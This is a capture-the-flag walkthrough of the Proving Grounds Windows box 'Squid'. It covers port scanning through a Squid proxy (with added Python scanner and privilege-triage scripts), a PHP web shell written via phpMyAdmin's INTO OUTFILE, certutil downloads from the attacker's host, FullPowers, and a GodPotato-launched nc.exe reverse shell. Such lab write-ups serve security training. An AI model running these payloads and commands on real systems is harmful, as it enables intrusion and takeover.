Squid

Source: Proving Grounds | OS: Windows | Community Rating: Hard

Enumeration & Reconnaissance

  • As usual, autorecon came back with a pile of open ports: 135, 139, 445, 3128, 49666 and 49667.

  • Port 3128 (HTTP) was running Squid, which is an HTTP proxy. After a lot of searching I found a CVE but no working PoC. Instead, HackTricks pointed me to spose.py, a port scanner that works through a Squid proxy: it asks the proxy to fetch http://target:port/ for each port and reads Squid's reply to tell open ports from closed ones. Running it against the box revealed two additional ports that nmap had not seen from the outside: 3306 and 8080.

Squid
Spose
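The scan described above, as an added example of how spose-style scanning through Squid works (this is my own re-implementation, not spose.py and not code from the original post). The proxy has to open a TCP connection to target:port on our behalf; when that fails, Squid answers with its own error page and an X-Squid-Error header naming the failure (for example ERR_CONNECT_FAIL followed by the errno), and when it succeeds, whatever the listener sent comes back, even if it is not HTTP. The errno tables and the body-search fallback are assumptions about Squid's output, and the proxy and target addresses are whatever you pass on the command line.

```python
"""Port-scan a host through a Squid HTTP proxy by bouncing GET requests off it.

Added example, not spose.py. Assumptions: Squid reports its own failures in an
X-Squid-Error header of the form "<TOKEN> <errno>" and repeats the token in the
HTML error page; errno meanings below follow Linux/BSD/Windows conventions.
"""
import http.client
import sys

OPEN, CLOSED, FILTERED, DENIED, UNKNOWN = "open", "closed", "filtered", "denied", "unknown"

CONNECT_FAIL = "ERR_CONNECT_FAIL"
# errno values that mean "connect timed out / host unreachable" (assumed set):
# ETIMEDOUT (110 Linux, 60 BSD, 10060 Windows), EHOSTUNREACH (113 Linux).
TIMEOUT_ERRNOS = {"110", "60", "10060", "113"}


def classify(headers: dict, body: bytes) -> str:
    """Turn one proxied response into an open/closed/filtered/denied verdict.

    `headers` must use lower-case keys. If the X-Squid-Error header is absent
    (older Squid, or a proxy that strips it) the HTML body is searched for the
    error token instead.
    """
    err = headers.get("x-squid-error", "")
    if not err:
        text = body.decode("latin-1", "replace")
        for token in ("ERR_ACCESS_DENIED", CONNECT_FAIL, "ERR_DNS_FAIL"):
            if token in text:
                err = token
                break
    if not err:
        # No Squid-generated error: the proxy relayed a reply from the listener.
        return OPEN
    token, _, errno = err.partition(" ")
    if token == "ERR_ACCESS_DENIED":
        # Blocked by the proxy's own ACLs (e.g. Squid's default Safe_ports
        # rule for ports below 1025); says nothing about the target port.
        return DENIED
    if token == CONNECT_FAIL:
        return FILTERED if errno in TIMEOUT_ERRNOS else CLOSED
    if token == "ERR_DNS_FAIL":
        return UNKNOWN
    # ERR_ZERO_SIZE_OBJECT, ERR_READ_ERROR, ERR_INVALID_RESP, ERR_READ_TIMEOUT...:
    # the TCP connect succeeded but the service did not speak HTTP (MySQL, SMB).
    return OPEN


def probe(proxy: tuple, target: str, port: int, timeout: float = 5.0) -> str:
    """Send 'GET http://target:port/' via the proxy and classify the reply."""
    conn = http.client.HTTPConnection(proxy[0], proxy[1], timeout=timeout)
    try:
        # An absolute URL in the request line is what makes Squid act as a
        # forward proxy; http.client derives the Host header from it.
        conn.request("GET", f"http://{target}:{port}/", headers={"Connection": "close"})
        resp = conn.getresponse()
        headers = {k.lower(): v for k, v in resp.getheaders()}
        return classify(headers, resp.read(65536))
    except (OSError, http.client.HTTPException):
        # Proxy unreachable, timed out, or sent something unparseable.
        return UNKNOWN
    finally:
        conn.close()


def scan(proxy: tuple, target: str, ports, timeout: float = 5.0) -> dict:
    """Probe every port in `ports`; returns {port: verdict}."""
    return {p: probe(proxy, target, p, timeout) for p in ports}


if __name__ == "__main__":
    # Usage: python squid_scan.py PROXY_HOST PROXY_PORT TARGET PORT [PORT ...]
    # e.g.   python squid_scan.py 192.168.155.189 3128 127.0.0.1 3306 8080 80 445
    phost, pport, target, *ports = sys.argv[1:]
    for port, verdict in scan((phost, int(pport)), target, map(int, ports)).items():
        if verdict != CLOSED:
            print(f"{target}:{port}\t{verdict}")
```

Scan both 127.0.0.1 and the box's own external address: a service bound only to loopback is reachable via the proxy but invisible to nmap, which is exactly how 3306 and 8080 surfaced here. A "denied" verdict means the proxy's ACLs refused the request, not that the port is closed, so low ports that come back denied still need another route.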

Gaining Initial Access

  • To reach them, I pointed my browser at 192.168.155.189:3128 as its HTTP proxy and started investigating.

Proxy Settings
  • 3306 was MySQL; opening it through the proxy only offered a small file for download (a browser cannot render the MySQL handshake), so there was nothing to do with it from there.

  • 8080 was where things got interesting: phpMyAdmin was exposed!

  • I tried root with an empty password, and it worked. The tables held nothing valuable, so I decided to write a web shell to disk with SQL.

PHP Info
  • First I needed the web root. The phpinfo() page in phpMyAdmin came in handy and gave me the path (C:/wamp/www). Now I could write my shell:

select '<?php system($_GET["cmd"]); ?>;' into outfile 'C:/wamp/www/shell.php';

  • This works only because root holds the FILE privilege and secure_file_priv does not restrict where INTO OUTFILE may write (an empty value means unrestricted; if it names a directory, only that directory is allowed). The file is also written by the MySQL service account, so the target directory must be writable by it.
Web Shell
  • With that, I had a web shell. Time to turn it into a full reverse shell: fetch a second PHP file from a web server on my attacking machine with certutil, then execute it. Both requests go through the Squid proxy, just like the browser traffic:

http://192.168.155.189:8080/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.45.240%3A901%2Fshell.php
http://192.168.155.189:8080/shell.php?cmd=.%2Fshell.php

  • Decoded, the two commands are certutil -urlcache -split -f http://192.168.45.240:901/shell.php (download the reverse-shell file) and ./shell.php (run it).
Reverse Shell

Privilege Escalation

  • After getting a foothold, I checked which privileges my token held, uploaded winPEAS and looked around, but nothing obvious stood out. Searching online, I found a trick that lets service accounts (LOCAL SERVICE and NETWORK SERVICE) regain the privileges they are granted by default when a service has been started with a stripped-down token.

  • I downloaded and ran the PoC, FullPowers.exe. It creates a scheduled task that runs as the current service account, and the Task Scheduler starts that task with the account's full default privilege set, which brought back SeImpersonatePrivilege alongside the other missing privileges.

Gaining Privileges
  • With SeImpersonatePrivilege back, I could use GodPotato to escalate to SYSTEM. The first two lines pull GodPotato and nc.exe from my web server; the third runs nc as GodPotato's payload, connecting back to my listener on port 9100:

certutil -urlcache -split -f http://192.168.45.240:901/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.240 9100"
  • And just like that, the listener on 9100 caught a shell running as NT AUTHORITY\SYSTEM.

Privilege Escalation
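The triage that decides between "go straight to a Potato" and "run FullPowers first", as an added example (my own helper, not from the original post or from the FullPowers/GodPotato projects). It parses pasted `whoami /user` and `whoami /priv` output: a Potato needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege on the token (Disabled is fine, a process can enable a privilege it holds), and FullPowers only applies to LOCAL SERVICE / NETWORK SERVICE accounts whose default set was stripped. The sample whoami output below is constructed, and the account list FullPowers covers is taken from its description rather than tested here.

```python
"""Decide whether a Windows foothold can use a Potato exploit directly or
needs FullPowers first. Added example; parses `whoami /user` + `whoami /priv`."""
import re

# Accounts whose default privilege set FullPowers can restore (assumption:
# LOCAL SERVICE and NETWORK SERVICE, as described by the tool's author).
SERVICE_ACCOUNTS = {"nt authority\\local service", "nt authority\\network service"}
# Either of these on the token is enough for GodPotato and friends.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_priv(output: str) -> dict:
    """Return {privilege name: state} from `whoami /priv` text.

    Rows sit below a '====' rule and look like
    'SeImpersonatePrivilege  Impersonate a client after authentication Enabled';
    the description may be separated from the state by a single space, so the
    name is the first whitespace token and the state the last one.
    """
    privs, in_table = {}, False
    for line in output.splitlines():
        if line.startswith("===="):
            in_table = True
            continue
        tokens = line.split()
        if in_table and len(tokens) >= 2 and tokens[0].startswith("Se"):
            privs[tokens[0]] = tokens[-1]
    return privs


def parse_user(output: str) -> str:
    """Return the lower-case 'domain\\name' from `whoami` or `whoami /user`.

    The /user table pads the name column, so the SID may follow after one
    space; drop any S-1-... token instead of splitting on column widths.
    """
    for line in output.splitlines():
        if "\\" in line and not line.startswith(("=", "-")):
            tokens = [t for t in line.split() if not re.match(r"^S-1-\d", t)]
            return " ".join(tokens).lower()
    return ""


def triage(user_output: str, priv_output: str) -> str:
    """'potato' if an impersonation privilege is already held, 'fullpowers' if
    we are a service account that lost it, 'other' if neither applies."""
    user = parse_user(user_output)
    privs = parse_priv(priv_output)
    if POTATO_PRIVS & privs.keys():
        return "potato"
    if user in SERVICE_ACCOUNTS:
        return "fullpowers"
    return "other"


# Constructed sample output (not captured from the box).
USER_INFO = """USER INFORMATION
----------------

User Name                    SID
============================ ========
nt authority\\network service S-1-5-20
"""

STRIPPED_PRIV = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

RESTORED_PRIV = STRIPPED_PRIV + """SeAssignPrimaryTokenPrivilege Replace a process level token  Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""

if __name__ == "__main__":
    print(parse_user(USER_INFO), "->", triage(USER_INFO, STRIPPED_PRIV))   # fullpowers
    print(parse_user(USER_INFO), "->", triage(USER_INFO, RESTORED_PRIV))   # potato
```

Paste the real whoami output into the two strings (or read them from files) and the verdict tells you which step comes next; a result of "other" with no impersonation privilege means neither FullPowers nor a Potato applies and you need a different route.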

Lessons Learned

  • Default creds still work in 2024.

  • Sometimes, searching for a working PoC is a waste of time, pivoting to alternative tools (like spose.py) can be faster.

  • phpMyAdmin + empty root password = instant win. Upload a web shell right away!

  • Web shells are still one of the easiest ways to pivot into a full reverse shell.

  • When you land as a service account with a stripped-down set of privileges, restoring the account's default privileges (FullPowers) is a path worth exploring before giving up on the Potato family.
